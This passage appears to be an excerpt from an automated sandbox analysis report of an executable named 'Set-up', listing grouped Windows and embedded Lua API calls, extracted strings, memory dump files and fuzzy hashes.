                                                                                          • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 00A8867A
                                                                                          • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 00A88692
                                                                                          • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 00A886B6
                                                                                          • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 00A886DA
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00A886F7
                                                                                          • ??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00A88712
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getgloballocale@locale@std@@Init@locale@std@@Locimp@12@Locimp@12@_RegisterV42@@Vfacet@locale@2@std::_$D@std@@Getcat@?$ctype@Getcat@?$ctype@_W@std@@
                                                                                          • String ID:
                                                                                          • API String ID: 3490715262-0
                                                                                          • Opcode ID: 8ff74044df12941e8f6a3b94904c01c6c2d04cad15cb3224f8d05e4b1aaf9cc5
                                                                                          • Instruction ID: 1a964e03846e7f9d4679f2e56bdf2345a453b58bac6a078dac55df3f3e618b6d
                                                                                          • Opcode Fuzzy Hash: 8ff74044df12941e8f6a3b94904c01c6c2d04cad15cb3224f8d05e4b1aaf9cc5
                                                                                          • Instruction Fuzzy Hash: 5DF19D70D00219DFDB14EFA4D944BAEBBB5FF04314F548169E806AB291EF34AE06CB91
                                                                                          APIs
                                                                                          • lua_tolstring.SET-UP(?,?,00000000,?,?,?,?,?,?), ref: 00BDAE8E
                                                                                          • lua_tolstring.SET-UP(?,?,00000000,?,?,?,?,?,?), ref: 00BDAED4
                                                                                          • lua_pushfstring.SET-UP(?,invalid option '%s',00000000,00000004,?,?,?), ref: 00BDAF14
                                                                                          • luaL_argerror.SET-UP(?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF21
                                                                                          • lua_checkstack.SET-UP(?,?,?,?,?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF3B
                                                                                          • luaL_error.SET-UP(?,stack overflow (%s),?,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF5A
                                                                                          • luaL_error.SET-UP(?,stack overflow,?,00000000,?,?,00000004,?,?,?), ref: 00BDAF65
                                                                                          • luaL_argerror.SET-UP(?,?,value expected,?,?,?,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDAFD2
                                                                                          • lua_tolstring.SET-UP(?,?,?,?,?,?,?,value expected,?,?,?,?,?,stack overflow,?,00000000), ref: 00BDAFED
                                                                                          • lua_tolstring.SET-UP(?,?,?,00000000,?,?,00000004,?,?,stack overflow,?,00000000,?,?,00000004), ref: 00BDB036
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: lua_tolstring$L_argerrorL_error$lua_checkstacklua_pushfstring
                                                                                          • String ID: invalid option '%s'$stack overflow$stack overflow (%s)$value expected
                                                                                          • API String ID: 4106751321-40620427
                                                                                          • Opcode ID: e42765be05bb12658b814c79ab7486314cb4526e670075daf5d35f0be65b35ef
                                                                                          • Instruction ID: 64b12ad2beaab61c9e240de5822206cf9fe30708eced579c95b3ad6baa130239
                                                                                          • Opcode Fuzzy Hash: e42765be05bb12658b814c79ab7486314cb4526e670075daf5d35f0be65b35ef
                                                                                          • Instruction Fuzzy Hash: 6C81D6752042086BCB249F28E841AAAF7DADB85320F1585EBFD1887352FB31DD05D296
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,70576E16), ref: 00A627B2
                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00A627C8
                                                                                          • LoadLibraryExW.KERNEL32(D2D1.DLL,00000000,00000000), ref: 00A627E1
                                                                                          • GetProcAddress.KERNEL32(00000000,D2D1CreateFactory), ref: 00A627F2
                                                                                          • LoadLibraryExW.KERNEL32(DWRITE.DLL,00000000,00000000), ref: 00A62810
                                                                                          • GetProcAddress.KERNEL32(00000000,DWriteCreateFactory), ref: 00A62821
                                                                                          • SystemParametersInfoW.USER32(0000200C,00000000,?,00000000), ref: 00A6289E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressProc$LibraryLoad$HandleInfoModuleParametersSystem
                                                                                          • String ID: D2D1.DLL$D2D1CreateFactory$DWRITE.DLL$DWriteCreateFactory$SetDefaultDllDirectories$kernel32.dll
                                                                                          • API String ID: 1659932648-1570380350
                                                                                          • Opcode ID: c9bc1afce9037c7d1f24b158aed34ee8364c86603bd67fc04d039cde56752d1c
                                                                                          • Instruction ID: bdbf2f1b19230de0560efa213718e62d020881647d83837ee9c08ba128808431
                                                                                          • Opcode Fuzzy Hash: c9bc1afce9037c7d1f24b158aed34ee8364c86603bd67fc04d039cde56752d1c
                                                                                          • Instruction Fuzzy Hash: A4517771A05615AFDB14DBE5DC84FAEBBB8EB48B14F114168E905A72D0CBB0E801CB65
                                                                                          APIs
                                                                                          • FillRect.USER32(00BFFB8B,?,00000006), ref: 00A68E00
                                                                                          • FillRect.USER32(00BFFB8B,?,0000000E), ref: 00A68E0B
                                                                                          • GetSysColor.USER32(0000000D), ref: 00A68E15
                                                                                          • SetBkColor.GDI32(00BFFB8B,00000000), ref: 00A68E1B
                                                                                          • FillRect.USER32(00BFFB8B,?,00000006), ref: 00A68E29
                                                                                          • GetSysColor.USER32(00000005), ref: 00A68E37
                                                                                          • SetBkColor.GDI32(00BFFB8B,00000000), ref: 00A68E3D
                                                                                          • GetSysColor.USER32(00000008), ref: 00A68E45
                                                                                          • SetTextColor.GDI32(00BFFB8B,00000000), ref: 00A68E4B
                                                                                          • InflateRect.USER32(?,000000FE,00000000), ref: 00A68EB9
                                                                                          • DrawTextW.USER32(00BFFB8B,?,?,?,00008920), ref: 00A68F10
                                                                                          • DrawTextA.USER32(00BFFB8B,00C0DADD,00C0DADE,?,00008920), ref: 00A68F45
                                                                                          • SetTextAlign.GDI32(00BFFB8B,00000000), ref: 00A69060
                                                                                          • GetClientRect.USER32(00000000,?), ref: 00A690EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$Rect$Text$Fill$Draw$AlignClientInflate
                                                                                          • String ID:
                                                                                          • API String ID: 4274750162-0
                                                                                          • Opcode ID: dedbb33605f8bbaf1186c8b10ecfb4aa5eadcbfd0fa812e48bd1f526ffc41260
                                                                                          • Instruction ID: 2a7600b014117a36372af974303b671d385094c733afbd1531269faf5eb2c71e
                                                                                          • Opcode Fuzzy Hash: dedbb33605f8bbaf1186c8b10ecfb4aa5eadcbfd0fa812e48bd1f526ffc41260
                                                                                          • Instruction Fuzzy Hash: 7BF1E375A04219DFCB20CF69C944BADBBF5FF48310F158299E949A7290DB32E991CF90
                                                                                          APIs
                                                                                          • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00BDBC01
                                                                                          • freopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00C5F370,?), ref: 00BDBC51
                                                                                            • Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00BDBC1B), ref: 00BDBB13
                                                                                            • Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB3D
                                                                                            • Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?,00BDBC1B), ref: 00BDBB53
                                                                                            • Part of subcall function 00BDBAF0: getc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBB65
                                                                                          • lua_pushfstring.SET-UP(?,@%s,?), ref: 00BDBC8E
                                                                                          • lua_load.SET-UP(?,00BDB9C0,?,?,?), ref: 00BDBD4B
                                                                                          • ferror.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBD5B
                                                                                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00BDBD70
                                                                                          • lua_settop.SET-UP(?,?), ref: 00BDBD83
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: getc$__acrt_iob_funcfcloseferrorfreopenlua_loadlua_pushfstringlua_settop
                                                                                          • String ID: =stdin$@%s$open$read$reopen
                                                                                          • API String ID: 2661936588-2372923574
                                                                                          • Opcode ID: cbd7bb629265df65b3730cba18750fbde2c35e028fb4f0ee645cf5895b7e42c1
                                                                                          • Instruction ID: 0419725f1af31f61e08597e0f01136b58154eece38cd08cbee6a874b3c8e9258
                                                                                          • Opcode Fuzzy Hash: cbd7bb629265df65b3730cba18750fbde2c35e028fb4f0ee645cf5895b7e42c1
                                                                                          • Instruction Fuzzy Hash: A661A4756043458BCB14EF28989196FB7E5EF84314F0549BEF85A8B392EF30D809CB92
                                                                                          APIs
                                                                                          • DestroyMenu.USER32(?), ref: 00ACA3B9
                                                                                          • CreatePopupMenu.USER32 ref: 00ACA3C9
                                                                                          • TrackPopupMenu.USER32(?,00000002,00000000,00000000,00000000,?,00000000), ref: 00ACA577
                                                                                          • DestroyMenu.USER32(?), ref: 00ACA588
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$DestroyPopup$CreateTrack
                                                                                          • String ID: Copy$Cut$Delete$Paste$Redo$Select All$Undo
                                                                                          • API String ID: 2310181020-1698107729
                                                                                          • Opcode ID: 3b9fba0976acab34d110101ecad019f0ce8391fe677190aa16e64d5c2317c7e6
                                                                                          • Instruction ID: fcc6c0973f335aa9f2e39db081810f4216843384ad5dd4fa64cce0aaee949985
                                                                                          • Opcode Fuzzy Hash: 3b9fba0976acab34d110101ecad019f0ce8391fe677190aa16e64d5c2317c7e6
                                                                                          • Instruction Fuzzy Hash: CF519F34380209AFDB309F64C849FB9B7E1AF55704F26846CF9869B2C1DBB1A841DB52
                                                                                          APIs
                                                                                          • RegisterWindowMessageW.USER32(MSDEVColumnSelect), ref: 00A6C276
                                                                                          • RegisterWindowMessageW.USER32(Borland IDE Block Type), ref: 00A6C284
                                                                                          • RegisterWindowMessageW.USER32(MSDEVLineSelect), ref: 00A6C292
                                                                                          • RegisterWindowMessageW.USER32(VisualStudioEditorOperationsLineCutCopyClipboardTag), ref: 00A6C2A0
                                                                                          • GetCaretBlinkTime.USER32 ref: 00A6C30B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageRegisterWindow$BlinkCaretTime
                                                                                          • String ID: Borland IDE Block Type$MSDEVColumnSelect$MSDEVLineSelect$VisualStudioEditorOperationsLineCutCopyClipboardTag$`$`
                                                                                          • API String ID: 99429607-936588638
                                                                                          • Opcode ID: 705c61dac9e9b7422dbf33fb557934363aa56ec2f85e1c713373df06f850a8b2
                                                                                          • Instruction ID: 3733abc48435c23b00089724bebe4347c3108677a323236422936b773606cf2b
                                                                                          • Opcode Fuzzy Hash: 705c61dac9e9b7422dbf33fb557934363aa56ec2f85e1c713373df06f850a8b2
                                                                                          • Instruction Fuzzy Hash: 0AA16EB49193458ADF41CF55C59979A7BF0FF08318F1881B9DC0C9E28ADBBA2048DFA1
                                                                                          APIs
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00A68025
                                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00A6804E
                                                                                          • MulDiv.KERNEL32(00000000,?,00000060), ref: 00A68065
                                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00A68087
                                                                                          • MulDiv.KERNEL32(00000000,?,00000060), ref: 00A6809A
                                                                                          • CopyImage.USER32(00000000,00000002,?,00000000,00004004), ref: 00A680AC
                                                                                          • GetIconInfo.USER32(00000000,?), ref: 00A680C3
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00A680D6
                                                                                          • CreateIconIndirect.USER32(?), ref: 00A68114
                                                                                          • DeleteObject.GDI32(?), ref: 00A68125
                                                                                          • DeleteObject.GDI32(?), ref: 00A6812F
                                                                                          • DestroyCursor.USER32(00000000), ref: 00A68138
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$CursorDeleteIconMetricsSystem$CopyCreateDestroyImageIndirectInfoLoad
                                                                                          • String ID:
                                                                                          • API String ID: 2946484514-0
                                                                                          • Opcode ID: 817b62f3dbb418d6a7b4ca4f2e73266830177397c4eb6ea94500239ef179f148
                                                                                          • Instruction ID: efd3576db39d2475948eaa72e9537923c5ba328bba4d6870b5f47a98edb8fdad
                                                                                          • Opcode Fuzzy Hash: 817b62f3dbb418d6a7b4ca4f2e73266830177397c4eb6ea94500239ef179f148
                                                                                          • Instruction Fuzzy Hash: 3741AF75A00209AFDB24DFA4DD44BAEBBBCEB08750F054229F906E32A0DE759D44CB60
                                                                                          APIs
                                                                                          • luaL_setfuncs.SET-UP(?,00C386B0,00000000), ref: 00BEAFAD
                                                                                          • luaL_error.SET-UP(?,multiple Lua VMs detected), ref: 00BEB09B
                                                                                          • luaL_error.SET-UP(?,version mismatch: app. needs %f, Lua core provides %f), ref: 00BEB0B2
                                                                                          Strings
                                                                                          • memory allocation error: block too big, xrefs: 00BEB146
                                                                                          • mininteger, xrefs: 00BEB075
                                                                                          • version mismatch: app. needs %f, Lua core provides %f, xrefs: 00BEB0AC
                                                                                          • huge, xrefs: 00BEB005
                                                                                          • too many %s (limit is %d), xrefs: 00BEB12A
                                                                                          • multiple Lua VMs detected, xrefs: 00BEB095
                                                                                          • maxinteger, xrefs: 00BEB03D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_error$L_setfuncs
                                                                                          • String ID: huge$maxinteger$memory allocation error: block too big$mininteger$multiple Lua VMs detected$too many %s (limit is %d)$version mismatch: app. needs %f, Lua core provides %f
                                                                                          • API String ID: 2970048142-2361208633
                                                                                          • Opcode ID: f3dafa738876bc408c151a4893c257aaeea96044cdc3e5f0df9380b932efe2c9
                                                                                          • Instruction ID: f3e73848105c8875fd64f220b55050d7b26ac922d7e5d91d729257af81182280
                                                                                          • Opcode Fuzzy Hash: f3dafa738876bc408c151a4893c257aaeea96044cdc3e5f0df9380b932efe2c9
                                                                                          • Instruction Fuzzy Hash: DF51B4B06007045FD720AF28C842B5BB7E9DF45724F1086A9F869973D2EBB1ED148B96
                                                                                          APIs
                                                                                          • luaL_error.SET-UP(?,bad argument #%d (%s),?,?,00000001,?,?), ref: 00BDA918
                                                                                          • luaL_getmetafield.SET-UP(?,?,__name,00000001,?,?,?,?,bad argument #%d (%s),?,?,00000001,?,?), ref: 00BDA931
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: L_errorL_getmetafield
                                                                                          • String ID: %s expected, got %s$__name$bad argument #%d (%s)$light userdata
                                                                                          • API String ID: 2939061749-459126790
                                                                                          • Opcode ID: 69054947e7d14acead0f2a2a137167651fe7c34223dd0451fc748cbd9d5961e2
                                                                                          • Instruction ID: 9cb2373d48c1a401733076b44c1991722e984d300868c7fe950fcb44318afd9f
                                                                                          • Opcode Fuzzy Hash: 69054947e7d14acead0f2a2a137167651fe7c34223dd0451fc748cbd9d5961e2
                                                                                          • Instruction Fuzzy Hash: 4601D4755016187B5B246A158C02CBFFBEDDE46B51B44046AFD19A3342FA64BE0182BF
                                                                                          APIs
                                                                                          • luaL_newmetatable.SET-UP(?,?,?,LUABOX), ref: 00BDB457
                                                                                          • lua_setmetatable.SET-UP(?,000000FE), ref: 00BDB4A7
                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000047), ref: 00BDB4C5
                                                                                          • luaL_error.SET-UP(?,buffer too large), ref: 00BDB4E5
                                                                                          • luaL_prepbuffsize.SET-UP(?,?,?,?,?,?,?,buffer too large), ref: 00BDB502
                                                                                          • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,?,buffer too large), ref: 00BDB50C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2123943387.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2123927102.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124065685.0000000000C0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124098718.0000000000C53000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124114441.0000000000C54000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124132609.0000000000C5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124147961.0000000000C5F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124164359.0000000000C62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2124179868.0000000000C64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd
                                                                                          Similarity
                                                                                          • API ID: memcpy$L_errorL_newmetatableL_prepbuffsizelua_setmetatable
                                                                                          • String ID: LUABOX$__gc$buffer too large
                                                                                          • API String ID: 1698499383-1790742439
                                                                                          • Opcode ID: fb5467cf3a3015d0275f0e1fecc78f9dbb084373c5e91178f7af4401c14b3d8d
                                                                                          • Instruction ID: a9d4fdae783ca99f057f4e9356cbf9a0c541b3147c98c833fbb77a8d27fa623b
                                                                                          • Opcode Fuzzy Hash: fb5467cf3a3015d0275f0e1fecc78f9dbb084373c5e91178f7af4401c14b3d8d
                                                                                          • Instruction Fuzzy Hash: 61519071604204AFDB04DF19D881B5AFBE5FF85324F19C2AAE9088F396E775E840CB95
                                                                                          APIs
